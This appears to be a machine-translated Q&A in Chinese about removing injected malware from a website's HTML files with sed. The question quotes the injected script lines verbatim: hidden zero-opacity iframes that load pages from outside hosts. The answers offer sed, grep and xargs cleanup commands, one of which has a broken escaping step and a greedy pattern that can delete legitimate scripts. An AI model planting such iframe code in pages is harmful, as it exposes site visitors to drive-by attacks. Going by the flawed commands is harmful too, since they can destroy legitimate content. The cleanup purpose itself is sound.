我正在帮助某人清理网站上的恶意软件感染,并且我很难正确匹配sed中的某些字符串,因此我可以创建一个脚本来批量搜索并替换/删除它。
字符串是:
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script>
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
我似乎无法弄清楚如何逃避这些行中的各种角色......
如果我尝试删除整行,如果它与http://vidintex.com/includes/class.pop.php匹配,它也会删除</body>文件中的结束html .html。
所以我需要能够在sed中匹配整行:
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
非常感谢任何帮助!
答案 0 :(得分:1)
您可以尝试这样做:
sed -i '/vidintex.com\/includes\/class.pop.php/d' files*
这将删除包含vidintex.com/includes/class.pop.php
的所有行答案 1 :(得分:0)
您可以在sourceforge开始使用SMScanner!它会立即解决您的问题
答案 2 :(得分:0)
与Looking for script to delete iframe malware from linux server类似,您可以查找最终script标记旁边的body标记,并将其替换为body标记。此脚本将查找所有受影响的文件并删除最终脚本。
它有可能在最后找到带有脚本的真正文件 - 所以首先检查文件的grep是否只找到受感染的文件。
# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</script></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<script .*><\/script><\/body>/<\/body>/g'